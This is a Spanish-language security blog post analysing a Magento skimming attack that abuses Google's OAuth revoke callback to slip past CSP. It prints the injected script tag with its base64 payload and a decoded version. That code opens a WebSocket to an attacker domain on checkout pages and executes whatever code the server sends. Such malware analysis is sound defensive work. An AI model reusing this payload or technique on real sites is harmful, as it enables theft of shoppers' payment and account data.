Blog

Google OAuth Weaponizado Activa un WebSocket Malicioso

Un atacante está usando 'Google.com' para entregar y ejecutar su propio código en un ataque de Google OAuth weaponizado.

Jun 10, 2025 • 4 min read

Himanshu Anand Software Engineer

Analizamos un ataque client-side especialmente ingenioso en un sitio de eCommerce basado en Magento: parts[.]expert. Aunque no es un dominio de alto tráfico, la técnica de inyección utilizada merece atención, porque se oculta a plena vista.

El atacante está usando 'Google.com' para entregar y ejecutar su propio código y explotar las medidas de seguridad de OAuth, lo que puede comprometer credenciales de cuentas de Google y tokens de acceso.

Qué Encontramos

Nuestro sistema marcó un script proveniente de una URL inesperada:

<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>

A primera vista, parece una URL legítima de cierre de sesión OAuth del servidor de autorización:

accounts.google.com/o/oauth2/revoke.

Pero al analizarla más de cerca, el parámetro callback está weaponizado para ejecutar un payload JavaScript ofuscado mediante eval(atob(...)).

Análisis Paso a Paso

El payload codificado en base64 embebido en el callback se decodifica en otro script ofuscado, que crea dinámicamente una conexión WebSocket maliciosa hacia un dominio controlado por el atacante, lo que plantea serias preocupaciones de seguridad en WebSocket. Decodificado, el código es el siguiente:

(function() {
  let setupMaliciousWebSocket = () => {
    // Conectar al servidor WebSocket del atacante
    const ws = new WebSocket("wss:/livechatinc.network/chatpipe/029/");

    // Ejecutar cualquier código recibido desde el servidor
    ws.onmessage = (event) => {
      const maliciousCode = atob(event.data); // Decodificar Base64
      new Function(maliciousCode).call(event.target); // Ejecutar dinámicamente
    };
  };

  // Ejecutar si:
  // 1. El navegador está automatizado (p. ej., bots), O
  // 2. La URL contiene 'checkout' (p. ej., página de pago)
  if (navigator.webdriver || window.location.href.match('checkout')) {
    setupMaliciousWebSocket();
  }
})();

Qué Hace el Script

Se conecta a un servidor WebSocket malicioso si la página contiene checkout en la URL. O bien, si el navegador parece automatizado, abre una conexión wss:// hacia livechatinc[.]network/chatpipe/029/. Ese dominio ya está marcado como malicioso: enlace a VirusTotal, y son ejemplos claros de ataques WebSocket en acción.
Recibe y ejecuta payloads remotos: Cualquier mensaje codificado en base64 enviado a través del WebSocket se decodifica y ejecuta con new Function(...). Esto le otorga al atacante capacidades de ejecución remota completa dentro de la sesión del navegador del usuario (una técnica frecuentemente usada en phishing OAuth y otros ataques OAuth), y puede derivar en una filtración de datos, interceptando información sensible como direcciones de correo electrónico y datos de pago.
Consciente del momento y el contexto: El script se activa específicamente en páginas de checkout, probablemente para interceptar datos de pago o inyectar elementos fraudulentos en tiempo real.

Por Qué Es Importante

Parece legítimo: Aparenta cargar desde un dominio de Google, lo que recuerda al tráfico asociado a vulnerabilidades de Google OAuth, por lo que la mayoría de las herramientas de seguridad lo considerarían de confianza sin cuestionarlo. Una CSP no podrá detectar este ataque, ya que el dominio de confianza Google.com pasará sin problemas. Un filtro DNS en el dispositivo del usuario tampoco sería efectivo.
Evade los escáneres estáticos: La lógica peligrosa está anidada en dos capas de ofuscación y solo se ejecuta bajo condiciones específicas, lo que lo hace especialmente difícil de detectar para organizaciones que no cuentan con un evaluador de seguridad cualificado (QSA).
Control en tiempo real: Los payloads basados en WebSocket permiten a los atacantes enviar lógica maliciosa dinámica en función de las acciones del usuario.

Hemos visto antes suplantación de dominios y loaders ofuscados, pero esta combinación de redirección OAuth + control en vivo activado condicionalmente va un paso más allá.

Nuestro producto en cside fue capaz de identificar y detectar este ataque. Recibimos el payload completo del script descargado y lo analizamos antes de que llegue al navegador.

Puedes registrarte o solicitar una demo aquí.

Software Engineer Himanshu Anand

I'm a software engineer and security analyst.

Don't just take our word for it, ask AI

Monitoriza y Asegura tus Scripts de Terceros

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Reservar una demo

Comenzar gratis

Comienza gratis, o prueba Business con una prueba de 14 días.

Interfaz del panel de cside mostrando monitorización de scripts y análisis de seguridad

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre pixeles no autorizados en sitios de juego y responsabilidad bajo el GDPR

GDPR y juego en línea: por qué los píxeles no autorizados crean un problema de doble responsabilidad

Píxeles no autorizados en sitios de juego crean responsabilidad GDPR y bloqueos de cuentas publicitarias a la vez, aunque el operador no los instale.

Cómo Bloquear Bytespider (el Rastreador de IA de TikTok)

Bytespider rastrea tu sitio para los sistemas de IA de Bytedance. Aprende a bloquearlo con robots.txt y rangos de IP, y las claves de soberanía de datos.

Portada oscura del blog con tres métodos de ataque de scripts maliciosos: redireccionamientos desde el browser, contenedores GTM en la sombra con etiquetas maliciosas y payloads móviles geoespecíficos

Cómo los scripts maliciosos secuestran el recorrido de los jugadores de casino

Scripts inyectados redirigen a jugadores de casino antes del lobby. Las herramientas de red no los detectan. Así debe funcionar la detección.

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre seguridad de scripts para operadores de juego en APAC

Seguridad de scripts del lado del cliente para operadores de juego en línea en APAC

Cómo los operadores de juego en línea de APAC en Japón, Singapur, Filipinas y Australia pueden monitorizar scripts de terceros en sesiones reales.

Cómo Bloquear Amazon Buy for Me en Tu Sitio Web

Amazon Buy for Me compra en tu sitio para usuarios de Prime. Aprende cómo recopila datos de precios y productos y cómo la detección en el navegador te da control.

Prevención de account takeover: el playbook completo de 2026

El playbook operativo de ATO para 2026: un modelo integral para login, recuperación, sesión y defensa post-auth frente a la apropiación impulsada por agentes IA y bots.

Portada oscura del blog de cside con una onda de pixeles azules y una lista sobre scripts de afiliados comprometidos que roban ingresos de casinos

Cómo los scripts de afiliados comprometidos roban los ingresos de los casinos en línea

Scripts de afiliados comprometidos redirigen jugadores y roban comisiones en páginas de casino, de forma silenciosa y a escala.

Portada oscura del blog con tres vectores de ataque de extensiones del browser: redirecciones a clones de phishing, robo de tokens de sesión y reescritura de campos de pago en el DOM

Cómo las extensiones del browser atacan a los jugadores de casino en línea: qué pueden hacer los operadores

Las extensiones del browser pueden robar tokens de sesión y secuestrar pagos en casinos. Así atacan, por qué los servidores no lo ven y cómo detectarlas.

Cómo Bloquear la Creación de Cuentas Falsas con IA

Los agentes de IA crean cuentas falsas con un comportamiento humano que vence al CAPTCHA. Aprende las señales del navegador que delatan los registros automatizados.

Cómo Bloquear CCBot (el Rastreador de IA de Common Crawl)

CCBot alimenta los conjuntos de datos de Common Crawl usados para entrenar GPT-3, BLOOM, LLaMA y muchos otros modelos de IA. Aprende cómo bloquearlo y qué consigue realmente bloquearlo.